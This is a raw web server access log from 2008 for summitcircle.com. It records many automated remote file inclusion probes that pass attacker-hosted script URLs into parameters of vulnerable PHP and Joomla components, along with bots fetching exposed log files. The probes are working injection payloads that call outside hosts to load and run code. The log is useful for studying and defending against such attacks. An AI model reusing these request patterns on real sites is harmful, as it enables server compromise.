91.197.136.30 - - [15/Jun/2008:17:39:34 -0700] "GET /index.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:39:34 -0700] "GET /logs/index.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:40:19 -0700] "GET /logs/access_070924.log/start.php?site=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:40:19 -0700] "GET /start.php?site=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:40:20 -0700] "GET /logs/start.php?site=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
69.57.154.47 - - [15/Jun/2008:17:41:25 -0700] "GET /logs/oneadmin/adminfoot.php?path[docroot]=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
69.57.154.47 - - [15/Jun/2008:17:41:25 -0700] "GET /oneadmin/adminfoot.php?path[docroot]=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
64.255.101.89 - - [15/Jun/2008:17:42:36 -0700] "GET /logs/inc/cmses/aedatingCMS2.php?dir[inc]=http://davidcortright.com/halifaxcouksecurity/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.255.101.89 - - [15/Jun/2008:17:42:36 -0700] "GET /inc/cmses/aedatingCMS2.php?dir[inc]=http://davidcortright.com/halifaxcouksecurity/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:44:06 -0700] "GET /start.php?site=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
68.90.68.50 - - [15/Jun/2008:17:45:18 -0700] "GET /logs/access_080407.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
68.90.68.50 - - [15/Jun/2008:17:45:18 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
68.90.68.50 - - [15/Jun/2008:17:45:18 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:46:38 -0700] "GET /index.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
91.197.136.30 - - [15/Jun/2008:17:47:28 -0700] "GET /index.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.72.122.182 - - [15/Jun/2008:17:47:59 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
212.241.217.240 - - [15/Jun/2008:17:48:25 -0700] "GET /logs/access_071231.log//administrator/components/com_facileforms/admin.facileforms.php?mosConfig_admin_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
212.241.217.240 - - [15/Jun/2008:17:48:26 -0700] "GET //administrator/components/com_facileforms/admin.facileforms.php?mosConfig_admin_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
212.241.217.240 - - [15/Jun/2008:17:48:26 -0700] "GET /logs//administrator/components/com_facileforms/admin.facileforms.php?mosConfig_admin_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
78.153.222.210 - - [15/Jun/2008:17:49:51 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
65.55.208.10 - - [15/Jun/2008:17:50:01 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
65.55.208.10 - - [15/Jun/2008:17:50:01 -0700] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
217.20.163.130 - - [15/Jun/2008:17:50:24 -0700] "GET /logs/access.log//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
217.20.163.130 - - [15/Jun/2008:17:50:24 -0700] "GET /logs/access.log//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
217.20.163.130 - - [15/Jun/2008:17:50:25 -0700] "GET //admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
217.20.163.130 - - [15/Jun/2008:17:50:25 -0700] "GET //admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
217.20.163.130 - - [15/Jun/2008:17:50:25 -0700] "GET /logs//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
217.20.163.130 - - [15/Jun/2008:17:50:25 -0700] "GET /logs//admin/index.php?o=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
201.57.141.107 - - [15/Jun/2008:17:50:36 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
209.47.85.206 - - [15/Jun/2008:17:50:39 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
65.55.208.10 - - [15/Jun/2008:17:52:08 -0700] "GET /logs/?M=D HTTP/1.1" 200 9661 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
82.115.57.29 - - [15/Jun/2008:17:52:24 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
67.15.200.173 - - [15/Jun/2008:17:54:05 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.15.200.173 - - [15/Jun/2008:17:54:05 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.15.200.173 - - [15/Jun/2008:17:54:05 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.15.200.173 - - [15/Jun/2008:17:56:01 -0700] "GET /logs/access_071231.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
67.15.200.173 - - [15/Jun/2008:17:56:01 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
67.15.200.173 - - [15/Jun/2008:17:56:02 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
150.165.231.5 - - [15/Jun/2008:17:58:16 -0700] "GET /logs/access_071119.log/main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
150.165.231.5 - - [15/Jun/2008:17:58:17 -0700] "GET /main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
150.165.231.5 - - [15/Jun/2008:17:58:17 -0700] "GET /logs/main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:58:27 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:58:27 -0700] "GET /logs/access_080127.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:58:27 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:58:31 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:58:31 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.192.194 - - [15/Jun/2008:17:58:31 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
65.55.208.24 - - [15/Jun/2008:18:00:46 -0700] "GET /logs/access_080421.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
207.44.132.63 - - [15/Jun/2008:18:01:48 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.summitcircle.com"
207.44.132.63 - - [15/Jun/2008:18:01:48 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.summitcircle.com"
150.165.231.5 - - [15/Jun/2008:18:02:28 -0700] "GET /logs/access_080114.log/main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
150.165.231.5 - - [15/Jun/2008:18:02:36 -0700] "GET /main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.105.208.186 - - [15/Jun/2008:18:02:47 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.105.208.186 - - [15/Jun/2008:18:02:47 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.105.208.186 - - [15/Jun/2008:18:05:07 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
200.105.208.186 - - [15/Jun/2008:18:05:09 -0700] "GET /logs/access_080127.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.105.208.186 - - [15/Jun/2008:18:05:17 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.105.208.186 - - [15/Jun/2008:18:05:18 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.105.208.186 - - [15/Jun/2008:18:06:53 -0700] "GET /logs/access_080127.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.227.251.172 - - [15/Jun/2008:18:07:48 -0700] "GET /index.php?go=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
150.165.231.5 - - [15/Jun/2008:18:08:20 -0700] "GET /logs/access_071008.log/index.php?p=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
150.165.231.5 - - [15/Jun/2008:18:08:20 -0700] "GET /index.php?p=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
150.165.231.5 - - [15/Jun/2008:18:08:21 -0700] "GET /logs/index.php?p=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
211.202.2.219 - - [15/Jun/2008:18:08:26 -0700] "GET /logs/access_071112.log/display.php?page=&lang=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
211.202.2.219 - - [15/Jun/2008:18:08:26 -0700] "GET /display.php?page=&lang=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:18:08:35 -0700] "GET /logs/access.log/index2.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
91.197.136.30 - - [15/Jun/2008:18:08:35 -0700] "GET /index2.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
91.197.136.30 - - [15/Jun/2008:18:08:35 -0700] "GET /logs/index2.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
91.197.136.30 - - [15/Jun/2008:18:09:59 -0700] "GET /logs/access_080127.log/index2.php?pag=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:18:09:59 -0700] "GET /index2.php?pag=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:18:10:00 -0700] "GET /logs/index2.php?pag=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.105.208.186 - - [15/Jun/2008:18:10:05 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
200.105.208.186 - - [15/Jun/2008:18:10:05 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
193.140.181.20 - - [15/Jun/2008:18:10:08 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.140.181.20 - - [15/Jun/2008:18:10:09 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
211.202.2.219 - - [15/Jun/2008:18:10:11 -0700] "GET /logs/access_071231.log/display.php?page=&lang=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
211.202.2.219 - - [15/Jun/2008:18:10:12 -0700] "GET /display.php?page=&lang=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
91.197.136.30 - - [15/Jun/2008:18:10:13 -0700] "GET /logs/access_070924.log/index2.php?pag=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:18:10:38 -0700] "GET /logs/access_080225.log/index2.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:18:10:38 -0700] "GET /index2.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:18:10:38 -0700] "GET /logs/index2.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
211.202.2.219 - - [15/Jun/2008:18:10:58 -0700] "GET /display.php?page=&lang=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
91.197.136.30 - - [15/Jun/2008:18:12:52 -0700] "GET /index2.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
64.72.122.182 - - [15/Jun/2008:18:13:51 -0700] "GET /logs/access_080407.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.72.122.182 - - [15/Jun/2008:18:13:51 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:14:23 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:14:23 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:14:23 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:18:14:42 -0700] "GET /index2.php?pagina=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
150.165.231.5 - - [15/Jun/2008:18:14:46 -0700] "GET /logs/access.log/index.php?p=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
91.197.136.30 - - [15/Jun/2008:18:15:03 -0700] "GET /index2.php?pag=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:15:18 -0700] "GET /logs/access_071021.log/index.php?mn=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:15:19 -0700] "GET /index.php?mn=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:15:19 -0700] "GET /logs/index.php?mn=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.181.217.196 - - [15/Jun/2008:18:15:21 -0700] "GET /logs/access_070820.log/index.php?mn=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
76.234.49.129 - - [15/Jun/2008:18:16:29 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
76.234.49.129 - - [15/Jun/2008:18:16:29 -0700] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
76.234.49.129 - - [15/Jun/2008:18:16:29 -0700] "GET /logs//?mosConfig_absolute_path=http://www.airmatrix.net/components/com_joomlalib/standalone/id.txt? HTTP/1.1" 200 9666 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.140.181.20 - - [15/Jun/2008:18:17:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.140.181.20 - - [15/Jun/2008:18:17:56 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://h.b-warez.com/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
77.79.246.200 - - [15/Jun/2008:18:17:58 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
77.79.246.200 - - [15/Jun/2008:18:17:58 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
77.79.246.200 - - [15/Jun/2008:18:17:58 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:18:30 -0700] "GET /logs/access_071231.log//library/lib.php?root=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:18:30 -0700] "GET //library/lib.php?root=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:18:31 -0700] "GET /logs//library/lib.php?root=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:18:53 -0700] "GET /logs/access.log/errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:18:53 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.192.194 - - [15/Jun/2008:18:18:54 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
221.139.3.229 - - [15/Jun/2008:18:19:31 -0700] "GET /logs/access_070917.log//components/com_simpleboard/image_upload.php?sbp=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
221.139.3.229 - - [15/Jun/2008:18:19:31 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
